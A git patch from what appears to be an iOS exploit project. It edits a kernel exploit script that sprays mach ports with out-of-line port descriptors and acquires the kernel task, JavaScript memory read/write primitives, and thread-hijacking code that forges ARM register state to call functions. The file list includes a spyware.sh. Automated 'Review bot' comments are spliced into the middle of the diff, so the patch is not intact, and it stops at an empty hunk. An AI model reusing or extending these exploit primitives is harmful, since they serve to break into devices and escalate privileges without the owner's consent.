From 7de438565f03123d37f737d2cd905579e90bc21e Mon Sep 17 00:00:00 2001 
From: spv Date: Sun, 24 Apr 2022 21:30:15 -0400 Subject: yeet --- build.sh | 0 build_native.sh | 0 exploit.conf | 0 install.sh | 0 install_native.sh | 0 launch.json | 10 +-- old.js | 138 +++++++++++++++--------------- spyware.sh | 0 src/gen/common.h | 0 src/gen/ip_tools.c | 0 src/gen/ip_tools.h | 0 src/gen/patchfinder.h | 0 src/gen/shit.c | 62 +++++++------- src/gen/shit.h | 10 +-- src/gen/stage0_primitives.c | 0 src/gen/stage0_primitives.h | 0 src/gen/stage1_primitives.c | 0 src/gen/stage1_primitives.h | 0 src/js/kexp/exploit.js | 79 ++++++++++++++---- src/js/lib/myutils.js | 6 +- src/js/main.js | 13 +-- src/js/primitives/call.js | 25 +++--- src/js/primitives/mem.js | 15 ++++ tools/backup.c | 150 ++++++++++++++++----------------- tools/build.sh | 0 tools/build_native.sh | 0 tools/ent.xml | 0 tools/fuck_aslr.c | 0 tools/fuck_ptr.c | 0 tools/jit_all_the_things.c | 0 tools/shit.c | 124 +++++++++++++-------------- tools/test.c | 0 tools/testlol.c | 198 ++++++++++++++++++++++---------------------- tools/thread_shit.c | 0 34 files changed, 454 insertions(+), 376 deletions(-) mode change 100644 => 100755 build.sh mode change 100644 => 100755 build_native.sh mode change 100644 => 100755 exploit.conf mode change 100644 => 100755 install.sh mode change 100644 => 100755 install_native.sh mode change 100644 => 100755 launch.json mode change 100644 => 100755 old.js mode change 100644 => 100755 spyware.sh mode change 100644 => 100755 src/gen/common.h mode change 100644 => 100755 src/gen/ip_tools.c mode change 100644 => 100755 src/gen/ip_tools.h mode change 100644 => 100755 src/gen/patchfinder.h mode change 100644 => 100755 src/gen/stage0_primitives.c mode change 100644 => 100755 src/gen/stage0_primitives.h mode change 100644 => 100755 src/gen/stage1_primitives.c mode change 100644 => 100755 src/gen/stage1_primitives.h mode change 100644 => 100755 src/js/kexp/exploit.js mode change 100644 => 100755 src/js/lib/myutils.js mode change 100644 => 100755 tools/backup.c mode change 
100644 => 100755 tools/build.sh
mode change 100644 => 100755 tools/build_native.sh
mode change 100644 => 100755 tools/ent.xml
mode change 100644 => 100755 tools/fuck_aslr.c
mode change 100644 => 100755 tools/fuck_ptr.c
mode change 100644 => 100755 tools/jit_all_the_things.c
mode change 100644 => 100755 tools/shit.c
mode change 100644 => 100755 tools/test.c
mode change 100644 => 100755 tools/testlol.c
mode change 100644 => 100755 tools/thread_shit.c
diff --git a/build.sh b/build.sh
old mode 100644
new mode 100755
diff --git a/build_native.sh b/build_native.sh
old mode 100644
new mode 100755
diff --git a/exploit.conf b/exploit.conf
old mode 100644
new mode 100755
diff --git a/install.sh b/install.sh
old mode 100644
new mode 100755
diff --git a/install_native.sh b/install_native.sh
old mode 100644
new mode 100755
diff --git a/launch.json b/launch.json
old mode 100644
new mode 100755
index c2fecf3..1a7df09
--- a/launch.json
+++ b/launch.json
@@ -1,6 +1,6 @@
-{
- "name": "Launch",
- "type": "lldb",
- "request": "launch",
- "program": "${workspaceFolder}/tools/bin/thread_shit"
+{
+ "name": "Launch",
+ "type": "lldb",
+ "request": "launch",
+ "program": "${workspaceFolder}/tools/bin/thread_shit"
 }
\ No newline at end of file
diff --git a/old.js b/old.js
old mode 100644
new mode 100755
index 2dd0509..ce19c94
--- a/old.js
+++ b/old.js
@@ -1,70 +1,70 @@ -var dyld_shc_slide = get_dyld_shc_slide(); - - printf("still alive0\n"); - write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide); - printf("still alive1\n"); - write_u32(stack_shit + 0x0, 0x42069); - printf("still alive2\n"); - write_u32(stack_shit + 0x1, 0x69420); - printf("still alive3\n"); - write_u32(stack_shit + 0x2, 0x13371337); - printf("still alive4\n"); - write_u32(stack_shit + 0x3, 0x6969); - printf("still alive5\n"); - - printf("%s\n", prim_hexdump(read_buf(thread, 0x100))); - calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0); - printf("%x\n", read_u32(threadptr)); - thread = read_u32(threadptr); - calls4arg("usleep", 100000, 0, 0, 0); - printf("%s\n", prim_hexdump(read_buf(thread, 0x100))); -// call4arg(0x41414141, 0, 0, 0, 0); - printf("still alive6\n"); - write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); -// write_u32(th, 0xa03); - printf("thread=%x th=%x sym=%x\n", read_u32(thread), read_u32(th), sym_cache["pthread_mach_thread_np"]); - - var info = 0x134004; - var whatever = 0x134000; - - /* - var lol = new Uint8Array(0x100); - - for (i = 0; i < 0x10000; i++) { - write_buf(info, lol, 0x100); - write_u32(whatever, 0x100) -// printf("%x\n", calls4arg("mach_thread_self", 0, 0, 0, 0)); - calls4arg("thread_info", i, 3, info, whatever); -// printf("%s\n", prim_hexdump(read_buf(info, 0x100))); - if (read_u32(info) != 0) { -// printf("%s\n", prim_hexdump(read_buf(info, 0x100))); - printf("hit: %x\n", i); - } else if (i % 0x10 == 0) { - printf("%x\n", i); - } - }*/ - - printf("still alive7\n"); - write_u32(thread_state + (0 << 2), sptr("Hello, world! 
%x %x %x %x %x %x %x\n")); - printf("still alive8\n"); - write_u32(thread_state + (1 << 2), 0x1337); - printf("still alive9\n"); - write_u32(thread_state + (2 << 2), 0x420); - printf("still alive10\n"); - write_u32(thread_state + (3 << 2), 0x69); - printf("still alive11\n"); - write_u32(thread_state + (13 << 2), stack_shit); - printf("still alive12\n"); - write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide); - printf("still alive13\n"); - write_u32(thread_state + (15 << 2), sym_cache["printf"]); - printf("still alive14\n"); - write_u32(thread_state + (16 << 2), 0x40000020); - - printf("still alive15\n"); - printf("%d\n", calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT)); - printf("still alive16\n"); - printf("%d\n", calls4arg("thread_resume", read_u32(th), 0, 0, 0)); - printf("still alive17\n"); - +var dyld_shc_slide = get_dyld_shc_slide(); + + printf("still alive0\n"); + write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide); + printf("still alive1\n"); + write_u32(stack_shit + 0x0, 0x42069); + printf("still alive2\n"); + write_u32(stack_shit + 0x1, 0x69420); + printf("still alive3\n"); + write_u32(stack_shit + 0x2, 0x13371337); + printf("still alive4\n"); + write_u32(stack_shit + 0x3, 0x6969); + printf("still alive5\n"); + + printf("%s\n", prim_hexdump(read_buf(thread, 0x100))); + calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0); + printf("%x\n", read_u32(threadptr)); + thread = read_u32(threadptr); + calls4arg("usleep", 100000, 0, 0, 0); + printf("%s\n", prim_hexdump(read_buf(thread, 0x100))); +// call4arg(0x41414141, 0, 0, 0, 0); + printf("still alive6\n"); + write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); +// write_u32(th, 0xa03); + printf("thread=%x th=%x sym=%x\n", read_u32(thread), read_u32(th), sym_cache["pthread_mach_thread_np"]); + + var info = 0x134004; + var whatever = 0x134000; + + /* + var lol = new Uint8Array(0x100); + + for (i = 
0; i < 0x10000; i++) { + write_buf(info, lol, 0x100); + write_u32(whatever, 0x100) +// printf("%x\n", calls4arg("mach_thread_self", 0, 0, 0, 0)); + calls4arg("thread_info", i, 3, info, whatever); +// printf("%s\n", prim_hexdump(read_buf(info, 0x100))); + if (read_u32(info) != 0) { +// printf("%s\n", prim_hexdump(read_buf(info, 0x100))); + printf("hit: %x\n", i); + } else if (i % 0x10 == 0) { + printf("%x\n", i); + } + }*/ + + printf("still alive7\n"); + write_u32(thread_state + (0 << 2), sptr("Hello, world! %x %x %x %x %x %x %x\n")); + printf("still alive8\n"); + write_u32(thread_state + (1 << 2), 0x1337); + printf("still alive9\n"); + write_u32(thread_state + (2 << 2), 0x420); + printf("still alive10\n"); + write_u32(thread_state + (3 << 2), 0x69); + printf("still alive11\n"); + write_u32(thread_state + (13 << 2), stack_shit); + printf("still alive12\n"); + write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide); + printf("still alive13\n"); + write_u32(thread_state + (15 << 2), sym_cache["printf"]); + printf("still alive14\n"); + write_u32(thread_state + (16 << 2), 0x40000020); + + printf("still alive15\n"); + printf("%d\n", calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT)); + printf("still alive16\n"); + printf("%d\n", calls4arg("thread_resume", read_u32(th), 0, 0, 0)); + printf("still alive17\n"); + calls4arg("sleep", 10, 0, 0, 0); \ No newline at end of file diff --git a/spyware.sh b/spyware.sh old mode 100644 new mode 100755 diff --git a/src/gen/common.h b/src/gen/common.h old mode 100644 new mode 100755 diff --git a/src/gen/ip_tools.c b/src/gen/ip_tools.c old mode 100644 new mode 100755 diff --git a/src/gen/ip_tools.h b/src/gen/ip_tools.h old mode 100644 new mode 100755 diff --git a/src/gen/patchfinder.h b/src/gen/patchfinder.h old mode 100644 new mode 100755 diff --git a/src/gen/shit.c b/src/gen/shit.c index 6e6c5c5..ef354d4 100644 --- a/src/gen/shit.c +++ b/src/gen/shit.c 
@@ -1,32 +1,32 @@
-#include
-#include "common.h"
-#include
-#include "shit.h"
-
-extern FILE* fp;
-
-int _asprintf(char **strp, const char *fmt, ...) {
- va_list ap;
- char* tmp = NULL;
-
- *strp = "";
-
- /*
- * shit
- */
-
- va_start(ap, fmt);
- vfprintf(fp, fmt, ap);
- va_end(ap);
-
-#if 0
- strcpy(fuck_memory_leaks, tmp);
-
- if (strp)
- *strp = fuck_memory_leaks;
-
- free(tmp);
-#endif
-
- return 0;
+#include
+#include "common.h"
+#include
+#include "shit.h"
+
+extern FILE* fp;
+
+int _asprintf(char **strp, const char *fmt, ...) {
+ va_list ap;
+ char* tmp = NULL;
+
+ *strp = "";
+
+ /*
+ * shit
+ */
+
+ va_start(ap, fmt);
+ vfprintf(fp, fmt, ap);
+ va_end(ap);
+
+#if 0
+ strcpy(fuck_memory_leaks, tmp);
+
+ if (strp)
+ *strp = fuck_memory_leaks;
+
+ free(tmp);
+#endif
+
+ return 0;
 }
\ No newline at end of file
diff --git a/src/gen/shit.h b/src/gen/shit.h
index aaa4b7f..d97a995 100644
--- a/src/gen/shit.h
+++ b/src/gen/shit.h
@@ -1,6 +1,6 @@
-#ifndef SHIT_H
-#define SHIT_H
-
-int _asprintf(char **strp, const char *fmt, ...);
-
+#ifndef SHIT_H
+#define SHIT_H
+
+int _asprintf(char **strp, const char *fmt, ...);
+
 #endif
\ No newline at end of file
diff --git a/src/gen/stage0_primitives.c b/src/gen/stage0_primitives.c
old mode 100644
new mode 100755
diff --git a/src/gen/stage0_primitives.h b/src/gen/stage0_primitives.h
old mode 100644
new mode 100755
diff --git a/src/gen/stage1_primitives.c b/src/gen/stage1_primitives.c
old mode 100644
new mode 100755
diff --git a/src/gen/stage1_primitives.h b/src/gen/stage1_primitives.h
old mode 100644
new mode 100755
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
old mode 100644
new mode 100755
index c28e59c..e0ef574
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -29,6 +29,7 @@ var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2; var req_init_port_set_address = 0x0 var req_init_port_set_count = 0x4 +var task_self = 0; var kslide = 0; var fakeportData = 0;
@@ -93,7 +94,7 @@ function spray_data(mem, size, num, portptr) { function copyinPort(kport, cnt) { var err = malloc(4); var ret = 0; - var self = mach_task_self(); + var self = task_self; var service = MACH_PORT_NULL; var client = malloc(4); var it = malloc(4); @@ -180,23 +181,43 @@ function spray(dict, size, port) { var kp = 0; function spray_ports(number_port_descs) { - printf("spray_ports\n"); + printf("spray_ports %d\n", number_port_descs); if (kp == 0) { kp = malloc(4); - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp); - mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND); + mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp); + mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND); } var mp = malloc(4); - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp); - printf("%x\n", read_u32(mp)); - mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND); + mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp); + var rmp = read_u32(mp); + mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND); - send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs); + send_ports(rmp, read_u32(kp), 2, number_port_descs); return mp; } +function fast_log2(n) { + var i = 0; + while (n >>= 1) { + i++; + } + + return i; +} + +function fast_array_mul(arr, n) { + var tmp_arr = arr; + var done = 0; + for (var i = 0; i < fast_log2(n) + 2; i++) { + tmp_arr = tmp_arr.concat(tmp_arr); + done = (1 << i); + } + + return tmp_arr; +} + function send_ports(target, payload, num, number_port_descs) { var init_port_set = malloc(num * 4); 
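Review bot: In the new fast_array_mul, `done = (1 << i);` is assigned on every iteration but never read, and the name overstates what the function does: it doubles the array `fast_log2(n) + 2` times, so the result holds 2^(floor(log2 n)+2) copies of `arr` — more than 2n and at most 4n (4 copies for n ≤ 1) — not n copies. Drop `done` and state the real contract above the function, e.g. `// repeats arr by doubling; yields between 2n and 4n copies, never exactly n`. The caller in the next hunk sizes its buffer with a bare `* 8`, so that relationship should be named in the same comment rather than left for the reader to reverse-engineer.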
@@ -204,23 +225,51 @@ function send_ports(target, payload, num, number_port_descs) { write_u32(init_port_set + (i << 2), payload); } - var buf = malloc(0x1c + (number_port_descs * 0xc)); + var buf = malloc(0x1c + (number_port_descs * 0xc * 8)); + write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs); + var new_buf_ = new Array(); + var tmp = u32_to_u8x4(init_port_set); + new_buf_.push(tmp[0]); + new_buf_.push(tmp[1]); + new_buf_.push(tmp[2]); + new_buf_.push(tmp[3]); + tmp = u32_to_u8x4(num); + new_buf_.push(tmp[0]); + new_buf_.push(tmp[1]); + new_buf_.push(tmp[2]); + new_buf_.push(tmp[3]); + new_buf_.push(0); + new_buf_.push(0); + new_buf_.push(19); + new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR); + + var new_buf = fast_array_mul(new_buf_, number_port_descs); + + fast_write_buf(buf + req_init_port_set, new_buf); + + /* for (var i = 0; i < number_port_descs; i++) { write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set); write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num); write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0); write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19); write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR); - } + }*/ write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE) write_u32(buf + req_head_msgh_request_port, target); write_u32(buf + req_head_msgh_reply_port, 0); write_u32(buf + req_head_msgh_id, 1337); - return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL); + var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL); + + free(buf); + + printf("%d %s\n", ret, mach_error_string(ret)); + + return ret; } function get_kernel_task() { 
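Review bot: The old descriptor loop is kept as a `/* … */` block between `fast_write_buf(buf + req_init_port_set, new_buf);` and the `write_u32(buf + req_head_msgh_bits, …)` line; delete it rather than carry dead code, since the new path builds the descriptors via fast_array_mul. The `* 8` in `var buf = malloc(0x1c + (number_port_descs * 0xc * 8));` is unexplained — it only makes sense once you know fast_array_mul over-generates, so a comment such as `// fast_array_mul yields up to 4x number_port_descs descriptors; allocate for that` belongs on that line. The send size handed to mach_msg is still `0x1c + (number_port_descs * 0xc)`, which is worth stating next to it so nobody "fixes" the two sizes to match.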
@@ -229,11 +278,13 @@ function get_kernel_task() { sanity_port = malloc(4); - mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, sanity_port); - mach_port_insert_right(mach_task_self(), read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND); + task_self = mach_task_self(); + + mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port); + mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND); limits = malloc(4); write_u32(limits, 1000); - mach_port_set_attributes(mach_task_self(), read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT); + mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT); printf("starting exploit\n"); diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js old mode 100644 new mode 100755 index 51fc055..325c490 --- a/src/js/lib/myutils.js +++ b/src/js/lib/myutils.js @@ -112,4 +112,8 @@ var io_service_open_extended = scall_wrapper("io_service_open_extended"); var IORegistryEntryGetChildIterator = scall_wrapper("IORegistryEntryGetChildIterator"); var IOIteratorNext = scall_wrapper("IOIteratorNext"); var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty"); -var mach_msg = scall_wrapper("mach_msg"); \ No newline at end of file +var mach_msg = scall_wrapper("mach_msg"); +var mmap = scall_wrapper("mmap"); +var free = scall_wrapper("free"); +var mlock = scall_wrapper("mlock"); +var mprotect = scall_wrapper("mprotect"); \ No newline at end of file diff --git a/src/js/main.js b/src/js/main.js index 4d978ef..ee0a627 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -12,6 +12,13 @@ var ARM_THREAD_STATE_COUNT = 0x11; var ARM_THREAD_STATE = 0x1; var LOG_SYSLOG = 0x28; +var PROT_READ = 0x1; +var PROT_WRITE = 0x2; +var PROT_EXEC = 0x4; + +var MAP_PRIVATE = 0x2; +var MAP_ANON = 0x1000; + try { puts("we out here in jsc"); } catch (e) { 
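Review bot: `task_self = mach_task_self();` is only assigned here in get_kernel_task(), yet copyinPort() and spray_ports() in the earlier hunks now read `task_self` instead of calling mach_task_self() themselves; any call into those before get_kernel_task() runs would pass 0 (MACH_PORT_NULL) as the task. The ordering dependency is invisible at the declaration, so add a comment there, `var task_self = 0; // cached mach_task_self(); valid only after get_kernel_task() has run`, or initialise it at declaration time if mach_task_self is callable at that point (I cannot tell from this hunk). get_kernel_task's body begins outside the hunk.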
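Review bot: The new `PROT_READ`/`PROT_WRITE`/`PROT_EXEC` and `MAP_PRIVATE`/`MAP_ANON` constants in main.js carry no note of which platform's `<sys/mman.h>` they mirror; `MAP_ANON = 0x1000` is the Darwin/BSD value and the anonymous-mapping flag is a different number on Linux, so a reader porting or auditing the mmap wrapper needs that stated. Suggest `// Darwin <sys/mman.h> values; MAP_ANON in particular is not portable` above the group.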
@@ -22,10 +29,6 @@ try { puts = function (){}; } -function csbypass() { - -} - function main() { /* * get slide and calculate slid base @@ -45,8 +48,6 @@ function main() { puts("we out here"); puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?"); -// csbypass(); - printf("slide=0x%x\n", slide); printf("*(uint8_t*)base = 0x%x\n", read_u8(base)); printf("*(uint16_t*)base = 0x%x\n", read_u16(base)); diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js index 97a47b6..e382470 100644 --- a/src/js/primitives/call.js +++ b/src/js/primitives/call.js @@ -118,6 +118,8 @@ function calls4arg(sym, r0, r1, r2, r3) { return call4arg(addy, r0, r1, r2, r3); } +var rth = 0; + function callnarg() { if (arguments.length < 1) { return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length); @@ -153,8 +155,15 @@ function callnarg() { calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0); thread = read_u32(threadptr); write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); + rth = read_u32(th); + } + + if (rth === 0) { + rth = read_u32(th); } +// calls4arg("thread_suspend", rth, 0, 0, 0); + /* * write first 4 to r0-r3, rest to stack */ @@ -198,12 +207,8 @@ function callnarg() { /* * set the state */ - calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT); - - /* - * probably un-necessary now, keeping in just in case for now - */ - calls4arg("thread_resume", read_u32(th), 0, 0, 0); + calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT); + calls4arg("thread_resume", rth, 0, 0, 0); /* * spin wait for return 
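Review bot: The `// calls4arg("thread_suspend", rth, 0, 0, 0);` line added to callnarg is commented-out code with no explanation; either remove it or say in one line why it is disabled. In the same hunk `rth` is loaded from `th` twice — once inside the thread-creation branch and again in the `if (rth === 0)` fallback — and the fallback alone already covers the freshly-created case, so the first `rth = read_u32(th);` can be dropped to leave a single load site. callnarg's body starts and ends outside the hunk.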
@@ -212,15 +217,15 @@ function callnarg() { /* * reset, it's used as input for thread_state size */ - write_u32(count, 0x100); - calls4arg("thread_get_state", read_u32(th), ARM_THREAD_STATE, thread_state, count); + write_u32(count, 17); + calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count); /* * if the pc is in (resolver, resolver + 8), suspend the thread * (to not spin endlessly), read r0 and return */ if (((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) && (read_u32(thread_state + (11 << 2)) == 0x1337)) { - calls4arg("thread_suspend", read_u32(th), 0, 0, 0); + calls4arg("thread_suspend", rth, 0, 0, 0); return read_u32(thread_state); } @@ -262,7 +267,7 @@ function scall() { args_to_pass.push(sptr(arguments[i])); } else { args_to_pass.push(arguments[i]); - if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000)) { + if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000) && (i == 1 || i == 3)) { force_callnarg = true; } } diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js index 85cd132..ff12fdd 100644 --- a/src/js/primitives/mem.js +++ b/src/js/primitives/mem.js @@ -91,6 +91,21 @@ function write_u32_buf(addy, buf, len) { return buf; } +function fast_write_buf(addy, buf) { + var upper_i = Math.floor(buf.length / 0x100); + + for (var i = 0; i < upper_i; i++) { + u8x4 = u32_to_u8x4(addy + (i * 0x100)); + parent[VECTOR_OFFSET + 0x0] = u8x4[0]; + parent[VECTOR_OFFSET + 0x1] = u8x4[1]; + parent[VECTOR_OFFSET + 0x2] = u8x4[2]; + parent[VECTOR_OFFSET + 0x3] = u8x4[3]; + for (var j = (i * 0x100); (j < (i * 0x100) + 0x100) && (j < buf.length); j++) { + child[j % 0x100] = buf[j]; + } + } +} + /* * write uint8_t */ diff --git a/tools/backup.c b/tools/backup.c old mode 100644 new mode 100755 index 1ed9921..c1472a3 --- a/tools/backup.c +++ b/tools/backup.c 
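Review bot: `write_u32(count, 17);` replaces the former 0x100 with a bare magic number, while the thread_set_state call earlier in this function spells the same value as `ARM_THREAD_STATE_COUNT` (0x11 in main.js). Write it as `write_u32(count, ARM_THREAD_STATE_COUNT);` so the in/out count passed to thread_get_state stays tied to the state size instead of drifting independently. callnarg's body continues outside the hunk.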
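Review bot: In the edited scall condition, `arguments[i] & 0xffff0000 == 0xffff0000` still parses as `arguments[i] & (0xffff0000 == 0xffff0000)` because `==` binds tighter than `&` in JavaScript, so the expression reduces to `arguments[i] & 1` and the second mask term to `0`; the added `&& (i == 1 || i == 3)` only narrows a test that never looks at the high half-word. Parenthesise each mask, and since `&` produces a signed 32-bit result compare it as unsigned, e.g. `(((arguments[i] & 0xffff0000) >>> 0) == 0xffff0000 || ((arguments[i] & 0xffff0000) >>> 0) == 0xfffe0000) && (i == 1 || i == 3)`. The precedence problem pre-dates this commit, but this is the line being changed. scall's body starts outside the hunk.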
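Review bot: In the new fast_write_buf, `u8x4 = u32_to_u8x4(addy + (i * 0x100));` has no `var`, so it creates or clobbers a global `u8x4` on every call; declare it locally with `var u8x4 = …`. Also, `var upper_i = Math.floor(buf.length / 0x100);` means a buffer whose length is not a multiple of 0x100 never has its trailing partial chunk written, although the inner loop's `j < buf.length` guard reads as if a partial chunk were expected; if the restriction is intentional, document it with `// buf.length must be a multiple of 0x100; a trailing partial chunk is not written`, otherwise `Math.ceil` is the bound that matches the inner guard.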
@@ -1,76 +1,76 @@ -#include -#include -#include -#include -#include - -void lol(void) { - puts("hello?"); -// *(uint32_t*)0x41424344 = 0; -} - -void* lol2(void* arg) { - while (1) ;; -} - -int main(int argc, char* argv[]) { - kern_return_t kr; - thread_t th; - mach_port_name_t mytask, mythread; - printf("Hello, world!\n"); - mytask = mach_task_self(); - mythread = mach_thread_self(); - - mmap(0x2000000, 0x100000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, 0, 0); - - char* test = malloc(0x100); - strcpy(test, "Hello, world! %x %x %x %x %x %x %x\n"); - - pthread_t thread; - pthread_create(&thread, NULL, lol2, NULL); - - puts("test"); - -// thread_create(mytask, &th); - th = pthread_mach_thread_np(thread); - printf("%x\n", mytask); - arm_thread_state_t state; - mach_msg_type_number_t count; - kr = thread_get_state(mythread, ARM_THREAD_STATE, (thread_state_t)&state, &count); - - uint32_t* stack_above = 0x2001000; - stack_above[0] = 0x42069; - stack_above[1] = 0x69420; - stack_above[3] = 0x13371337; - stack_above[4] = 0x6969; - -// fprintf(stderr, "%p %p\n", test, dlsym(RTLD_DEFAULT, "puts")); - -// exit(42); - -// *(uint32_t*)0x41414141 = 0; - -// memset(&state, 0, ARM_THREAD_STATE_COUNT * sizeof(uint32_t)); - - for (int i = 0; i < 13; i++) { - fprintf(stderr, "r%d=%x\n", i, state.__r[i]); - } - - *(uint32_t*)(0x346afc48 + 0x1b4c000) = 0x23d751fc + 0x1b4c000; - - state.__r[0] = test; - state.__r[1] = 0x1337; - state.__r[2] = 0x420; - state.__r[3] = 0x69; - state.__sp = (uint32_t)stack_above; - state.__lr = 0x23d751fc + 0x1b4c000; - state.__pc = ((uint32_t)dlsym(RTLD_DEFAULT, "printf")) | 1; - state.__cpsr = 0x40000020; - kr = thread_set_state(th, ARM_THREAD_STATE, (thread_state_t)&state, ARM_THREAD_STATE_COUNT); - kr = thread_resume(th); -// thread_call_enter((thread_call_func_t)&lol); - - sleep(1); - - return 0; +#include +#include +#include +#include +#include + +void lol(void) { + puts("hello?"); +// *(uint32_t*)0x41424344 = 0; +} + +void* lol2(void* arg) { + 
while (1) ;; +} + +int main(int argc, char* argv[]) { + kern_return_t kr; + thread_t th; + mach_port_name_t mytask, mythread; + printf("Hello, world!\n"); + mytask = mach_task_self(); + mythread = mach_thread_self(); + + mmap(0x2000000, 0x100000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, 0, 0); + + char* test = malloc(0x100); + strcpy(test, "Hello, world! %x %x %x %x %x %x %x\n"); + + pthread_t thread; + pthread_create(&thread, NULL, lol2, NULL); + + puts("test"); + +// thread_create(mytask, &th); + th = pthread_mach_thread_np(thread); + printf("%x\n", mytask); + arm_thread_state_t state; + mach_msg_type_number_t count; + kr = thread_get_state(mythread, ARM_THREAD_STATE, (thread_state_t)&state, &count); + + uint32_t* stack_above = 0x2001000; + stack_above[0] = 0x42069; + stack_above[1] = 0x69420; + stack_above[3] = 0x13371337; + stack_above[4] = 0x6969; + +// fprintf(stderr, "%p %p\n", test, dlsym(RTLD_DEFAULT, "puts")); + +// exit(42); + +// *(uint32_t*)0x41414141 = 0; + +// memset(&state, 0, ARM_THREAD_STATE_COUNT * sizeof(uint32_t)); + + for (int i = 0; i < 13; i++) { + fprintf(stderr, "r%d=%x\n", i, state.__r[i]); + } + + *(uint32_t*)(0x346afc48 + 0x1b4c000) = 0x23d751fc + 0x1b4c000; + + state.__r[0] = test; + state.__r[1] = 0x1337; + state.__r[2] = 0x420; + state.__r[3] = 0x69; + state.__sp = (uint32_t)stack_above; + state.__lr = 0x23d751fc + 0x1b4c000; + state.__pc = ((uint32_t)dlsym(RTLD_DEFAULT, "printf")) | 1; + state.__cpsr = 0x40000020; + kr = thread_set_state(th, ARM_THREAD_STATE, (thread_state_t)&state, ARM_THREAD_STATE_COUNT); + kr = thread_resume(th); +// thread_call_enter((thread_call_func_t)&lol); + + sleep(1); + + return 0; } \ No newline at end of file diff --git a/tools/build.sh b/tools/build.sh old mode 100644 new mode 100755 diff --git a/tools/build_native.sh b/tools/build_native.sh old mode 100644 new mode 100755 diff --git a/tools/ent.xml b/tools/ent.xml old mode 100644 new mode 100755 
diff --git a/tools/fuck_aslr.c b/tools/fuck_aslr.c old mode 100644 new mode 100755 diff --git a/tools/fuck_ptr.c b/tools/fuck_ptr.c old mode 100644 new mode 100755 diff --git a/tools/jit_all_the_things.c b/tools/jit_all_the_things.c old mode 100644 new mode 100755 diff --git a/tools/shit.c b/tools/shit.c old mode 100644 new mode 100755 index 6fa80d4..1fe00cd --- a/tools/shit.c +++ b/tools/shit.c 
